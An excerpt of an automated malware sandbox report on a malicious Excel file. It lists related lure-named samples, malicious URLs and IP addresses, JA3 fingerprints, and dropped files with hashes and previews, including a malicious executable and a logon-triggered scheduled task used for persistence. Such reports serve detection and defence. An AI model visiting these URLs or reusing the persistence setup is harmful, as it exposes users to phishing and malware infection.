	product_qoute_6847684898.xls	Get hash	malicious	Browse	37.46.150.211
	EjtRDKZNkXWoLTE.exe	Get hash	malicious	Browse	37.46.150.60
	ru7co.xls	Get hash	malicious	Browse	37.46.150.60
	http://37.46.150.184/high/iman	Get hash	malicious	Browse	37.46.150.184
	SWIFT-MTC749892-10-12-20_pdf.exe	Get hash	malicious	Browse	37.46.150.41
	SWIFT COPY.xls	Get hash	malicious	Browse	37.46.150.41
	PAYMENT DOC.xls	Get hash	malicious	Browse	37.46.150.41
	ORDER LIST.xls	Get hash	malicious	Browse	37.46.150.41
	AYnBjTXSlkDlSOE.exe	Get hash	malicious	Browse	37.46.150.41
	gnHtx3VKOGDjoD5.exe	Get hash	malicious	Browse	37.46.150.41
	MOT-1507xls.exe	Get hash	malicious	Browse	37.46.150.41
	TT(12-06-2020).exe	Get hash	malicious	Browse	37.46.150.178
CLOUDFLARENETUS	output.xls	Get hash	malicious	Browse	104.20.139.65
	Rfq 214871_TAWI Catalog.exe	Get hash	malicious	Browse	172.67.144.71
	output.xls	Get hash	malicious	Browse	104.20.138.65
	output.xls	Get hash	malicious	Browse	172.67.1.225
	output.xls	Get hash	malicious	Browse	104.20.138.65
	UaTCQiQ6XK.exe	Get hash	malicious	Browse	162.159.135.232
	spetsifikatsiya.xls	Get hash	malicious	Browse	104.22.1.232
	0000098.xlsx	Get hash	malicious	Browse	162.159.135.232
	http://megatech22.com/?pl=1525.c70d7c0b30c7b87e496879cd9715060b&n=aHR0cDovL2RlLmdld2lubmNvZGUubWVnYXRlY2gyMi5jb20vP3Nlc3Npb249NDBkMTUyMjRlNzg3NDFmOTgzYzIyNzcwNGMzOTFjMWMmYWZmX2lkPTIyNSZmcHA9MQ==	Get hash	malicious	Browse	172.67.177.163
	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse	172.67.1.225
	https://austalusa.mightymenofdavid.org/787423?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&&mic#8487?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&7523891&7523891&7523891&7523891	Get hash	malicious	Browse	104.26.9.44
	https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9	Get hash	malicious	Browse	172.67.74.213
	https://daceanevay.com/mailing/index.html	Get hash	malicious	Browse	104.16.19.94
	https://bit.ly/3mH4Noj	Get hash	malicious	Browse	104.18.37.186
	https://bitly.com/2Xaw8VA	Get hash	malicious	Browse	104.16.18.94
	https://j.mp/3rJBANn	Get hash	malicious	Browse	104.16.18.94
	https://bitly.com/2KZhv4G	Get hash	malicious	Browse	104.16.19.94
	http://delivery.unlocklocks.com/HSOMEU?id=124732=Jx8EBwNQDgsBTwECUwcIUlUBUx0=QgtZWk8ADFsJdkUDDQ9cU1AITVAdXENVHwYOUlwHUlMHUgMPUFtXAVMPTwoQF0QMHktdXV9aR1cRThYXC10MAl4OWlUKEE1XDVscKjcseXNkW1BcT0UD&fl=DBdARkJeFhdeXFVXEVleAwhYDxhRB1tCAA8AVRBTHQELDhtTYg1eVkAc	Get hash	malicious	Browse	172.64.196.24
	DRAFT-KMBT-F33C6592-96F3-4015-8107_IMG.exe	Get hash	malicious	Browse	162.159.135.233
	December SOA.exe	Get hash	malicious	Browse	162.159.135.233
CLOUDFLARENETUS	output.xls	Get hash	malicious	Browse	104.20.139.65
	Rfq 214871_TAWI Catalog.exe	Get hash	malicious	Browse	172.67.144.71
	output.xls	Get hash	malicious	Browse	104.20.138.65
	output.xls	Get hash	malicious	Browse	172.67.1.225
	output.xls	Get hash	malicious	Browse	104.20.138.65
	UaTCQiQ6XK.exe	Get hash	malicious	Browse	162.159.135.232
	spetsifikatsiya.xls	Get hash	malicious	Browse	104.22.1.232
	0000098.xlsx	Get hash	malicious	Browse	162.159.135.232
	http://megatech22.com/?pl=1525.c70d7c0b30c7b87e496879cd9715060b&n=aHR0cDovL2RlLmdld2lubmNvZGUubWVnYXRlY2gyMi5jb20vP3Nlc3Npb249NDBkMTUyMjRlNzg3NDFmOTgzYzIyNzcwNGMzOTFjMWMmYWZmX2lkPTIyNSZmcHA9MQ==	Get hash	malicious	Browse	172.67.177.163
	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse	172.67.1.225
	https://austalusa.mightymenofdavid.org/787423?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&&mic#8487?bWlrZS5iZWxsQGF1c3RhbHVzYS5jb20=&7523891&7523891&7523891&7523891	Get hash	malicious	Browse	104.26.9.44
	https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9	Get hash	malicious	Browse	172.67.74.213
	https://daceanevay.com/mailing/index.html	Get hash	malicious	Browse	104.16.19.94
	https://bit.ly/3mH4Noj	Get hash	malicious	Browse	104.18.37.186
	https://bitly.com/2Xaw8VA	Get hash	malicious	Browse	104.16.18.94
	https://j.mp/3rJBANn	Get hash	malicious	Browse	104.16.18.94
	https://bitly.com/2KZhv4G	Get hash	malicious	Browse	104.16.19.94
	http://delivery.unlocklocks.com/HSOMEU?id=124732=Jx8EBwNQDgsBTwECUwcIUlUBUx0=QgtZWk8ADFsJdkUDDQ9cU1AITVAdXENVHwYOUlwHUlMHUgMPUFtXAVMPTwoQF0QMHktdXV9aR1cRThYXC10MAl4OWlUKEE1XDVscKjcseXNkW1BcT0UD&fl=DBdARkJeFhdeXFVXEVleAwhYDxhRB1tCAA8AVRBTHQELDhtTYg1eVkAc	Get hash	malicious	Browse	172.64.196.24
	DRAFT-KMBT-F33C6592-96F3-4015-8107_IMG.exe	Get hash	malicious	Browse	162.159.135.233
	December SOA.exe	Get hash	malicious	Browse	162.159.135.233

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	output.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	output.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	spetsifikatsiya.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	spetsifikatsiya.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	Shipping Details DHL.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	AdviceSlip.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	PI 99-14.doc__.rtf	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	Archivo.doc	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	QUOTATION FP-240018.doc	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	QUOTATION FP-240018.doc	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	MDYL rj0810666.doc	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	List 2020_12_21 OZV3903.doc	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	Export Order Vene.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	info-122020-40367.doc	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	Invoice S2517158.doc	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	RQ-10375.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	RQ-10375.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	AIRWAY-BILLDELIVERY.xls	Get hash	malicious	Browse	172.67.8.238 172.67.167.122
	mal.doc	Get hash	malicious	Browse	172.67.8.238 172.67.167.122

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.106285813472883
Encrypted:	false
SSDEEP:	6:kK+FwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:PkPlE99SNxAhUegeT2
MD5:	05998788F56A7BBEB06542D13D8A67BC
SHA1:	58394F3FEAE625FDCDE3AEC69F718224AF5702DF
SHA-256:	16BA6B0E56F32FA63BECE76B6391C039FBF6D07BB7A4ADD4BB4C923F58B5F654
SHA-512:	B63C45B1E8A33E2B48C31BD6F5968AD4BF83CBDA9274A399BE020A1453B6BC0EC16758253AE0358B2C892EBBD84900CEE37CB47573F7FFA71E3D955889756F52
Malicious:	false
Preview:	p...... .........9......(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\Local\Temp\Cab2C30.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\F3FE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	147050
Entropy (8bit):	7.950162142222199
Encrypted:	false
SSDEEP:	3072:nPTYbtEJ1euGbs2a7phbXJsrhoOPAnlUH9A1kyWwu:nrYbC1Ubda7pZghPACRyNu
MD5:	0682ADAFB9D821D49526BD1B9BE8F79A
SHA1:	6F0D7D7AF2D8ADB7EB0EBE342D82A34C2E7AFE9F
SHA-256:	9292836FDDC9435A4CD9AB691E968C142E472569B377AEE62FDBCC0AC9051260
SHA-512:	07DDB8680DE3F360FD8F355FC0A9FA566FC4D3E720C6AE717570BF1297D4747ECB77C5DF2E8A6AD5F6B747CC7D018A7BABD8F2122848752E25A42617CEC7CDA5
Malicious:	false
Preview:	...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..\|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....\|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Tar2C31.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\ps.exe Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1163264
Entropy (8bit):	7.915040849931152
Encrypted:	false
SSDEEP:	24576:8mPsVSYhARcvhjuhGThHjY5hl70pJNw77YqXKM345BcyIc:64Yhv8h6dYFwpJ6XJC5H
MD5:	128409D5CB9701CD12600BAF7A623794
SHA1:	5E1F8E2C9421B3F7CABA07AE6BE503D272EBB8EB
SHA-256:	80104E0AD490B44A632A15E5875E7626DB7F35FA94D7AADF19C45A621D75C7E0
SHA-512:	267BBE58582CC95E9C45C05F19DEF1DABC491C1C55F6FD16A82256430AD805CE90B6472D934F42E539A40B99D98509E3E3B5E2A21600EFEAF26BC10E6F698681
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2._..............P..v...H......6.... ........@.. ....................... ............@....................................O.......PE........................................................................... ............... ..H............text...<t... ...v.................. ..`.rsrc...PE.......F...x..............@..@.reloc..............................@..B........................H.......................j..()...........................................0............(....(..........(.....o..........................(.......( ......(!......("......(#....N..(....o....($....&..(%.....s&........s'........s(........s)........s............0...........~....o+....+...0...........~....o,....+...0...........~....o-....+...0...........~....o.....+...0...........~....o/....+..&..(0.......0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....

C:\Users\user\AppData\Local\Temp\tmp121B.tmp Download File
Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1624
Entropy (8bit):	5.155516511399198
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBIOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq36o
MD5:	92780A1AFFA6988AB747662D1E2293D4
SHA1:	4BD18D97C0088C7EEB8471758D2C6E7A7349D912
SHA-256:	1571C2750BB9783C95048926B6256F599C9317551617D0871924D956D4A0A0CB
SHA-512:	F878338A856F4DF7350C7E28F6373651B845C1915BF67C4785C344FC907820F25A4B6B8E37A0E92DD5D9C34CD9399AB553FB36714ABED7278B1584AD264D2020
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Local\Temp\tmp71E7.tmp Download File
Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1624
Entropy (8bit):	5.155516511399198
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBIOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq36o
MD5:	92780A1AFFA6988AB747662D1E2293D4
SHA1:	4BD18D97C0088C7EEB8471758D2C6E7A7349D912
SHA-256:	1571C2750BB9783C95048926B6256F599C9317551617D0871924D956D4A0A0CB
SHA-512:	F878338A856F4DF7350C7E28F6373651B845C1915BF67C4785C344FC907820F25A4B6B8E37A0E92DD5D9C34CD9399AB553FB36714ABED7278B1584AD264D2020
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\ps.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1624
Entropy (8bit):	5.155516511399198
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBIOtn:cbhZ7ClNQi/rydbz9I3YODOLNdq36o
MD5:	92780A1AFFA6988AB747662D1E2293D4
SHA1:	4BD18D97C0088C7EEB8471758D2C6E7A7349D912
SHA-256:	1571C2750BB9783C95048926B6256F599C9317551617D0871924D956D4A0A0CB
SHA-512:	F878338A856F4DF7350C7E28F6373651B845C1915BF67C4785C344FC907820F25A4B6B8E37A0E92DD5D9C34CD9399AB553FB36714ABED7278B1584AD264D2020
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\ps.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1163264
Entropy (8bit):	7.915040849931152
Encrypted:	false
SSDEEP:	24576:8mPsVSYhARcvhjuhGThHjY5hl70pJNw77YqXKM345BcyIc:64Yhv8h6dYFwpJ6XJC5H
MD5:	128409D5CB9701CD12600BAF7A623794
SHA1:	5E1F8E2C9421B3F7CABA07AE6BE503D272EBB8EB
SHA-256:	80104E0AD490B44A632A15E5875E7626DB7F35FA94D7AADF19C45A621D75C7E0
SHA-512:	267BBE58582CC95E9C45C05F19DEF1DABC491C1C55F6FD16A82256430AD805CE90B6472D934F42E539A40B99D98509E3E3B5E2A21600EFEAF26BC10E6F698681
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2._..............P..v...H......6.... ........@.. ....................... ............@....................................O.......PE........................................................................... ............... ..H............text...<t... ...v.................. ..`.rsrc...PE.......F...x..............@..@.reloc..............................@..B........................H.......................j..()...........................................0............(....(..........(.....o..........................(.......( ......(!......("......(#....N..(....o....($....&..(%.....s&........s'........s(........s)........s............0...........~....o+....+...0...........~....o,....+...0...........~....o-....+...0...........~....o.....+...0...........~....o/....+..&..(0.......0..<........~.....(1.....,!r...p.....(2...o3...s4............~.....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Tue Jan 5 02:14:47 2021, atime=Tue Jan 5 02:14:47 2021, length=169984, window=hide
Category:	dropped
Size (bytes):	2568
Entropy (8bit):	4.476952625849961
Encrypted:	false
SSDEEP:	48:8X/XTFGqURC78uH+Qh2X/XTFGqURC78uH+Q/:8X/XJGqHj+Qh2X/XJGqHj+Q/
MD5:	FA2A6E2DA6EFD084F9AF9B6BCD547C6E
SHA1:	E4E41F6DA48DD2D2827A74BB0EA6E82F87571F5A
SHA-256:	261D5190D504802F31F824620CCA8D29F2B8677F6895E21B1755A14061F8F41B
SHA-512:	B8A3BF1BF5D3E86C58A9B5AFDF897D1BFD623E9B40F5743AD23009D69E61B0C62757E42DB72FBEECD29C26022DCECFB009CFDB8452C08E3CB608772194EACBD3
Malicious:	false
Preview:	L..................F.... ....@V..{..d.l......)s.............................;....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..z..%R.. .1E9B44~1.XLS..........Q.y.Q.y...8.....................1.e.9.b.4.4.5.c.b.9.8.7.e.5.a.1.c.b.3.d.1.5.e.6.f.d.6.9.3.3.0.9.a.4.5.1.2.e.5.3.e.0.6.e.c.f.b.1.a.3.e.7.0.7.d.e.b.d.e.f.7.3.5.5...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls.[.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.e.9.b.4.4.5.c.b.9.8.7.e.5.a.1.c.b.3.d.1.5.e.6.f.d.6.9.3.3.0.9.a.4.5.1.2.e.5.3.e.0.6.e.c.f.b.1.a.3.e.7.0.7.d.e.b.d.e.f.7.3.5.5..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 5 02:14:47 2021, atime=Tue Jan 5 02:14:47 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.483977382940036
Encrypted:	false
SSDEEP:	12:85QdqVCLgXg/XAlCPCHaX2B8GB/oTxX+Wnicvb7jLbDtZ3YilMMEpxRljK8CTdJU:85nU/XTm6G2xYefbDv3q+rNru/
MD5:	9361E5A65C51A7C5C90F42A03D65733F
SHA1:	AC2C57F74A6D0FED78EB8A94F1C42D326C23469C
SHA-256:	ACDCB45365D2A555051BB311BFB8DF401C753C9712C2F06EEEE5A81054D0382F
SHA-512:	4D2171B9019B69B9E4DE00437A2F68282DC7FF683E63FC6CE98E66FB2F8FF5FB65F1257C0B5C19F35575FAA4C817F67B4F365C5B65EAECE06013F4BA58C3879D
Malicious:	false
Preview:	L..................F...........7G..d.l.....d.l...... ......................i....P.O. 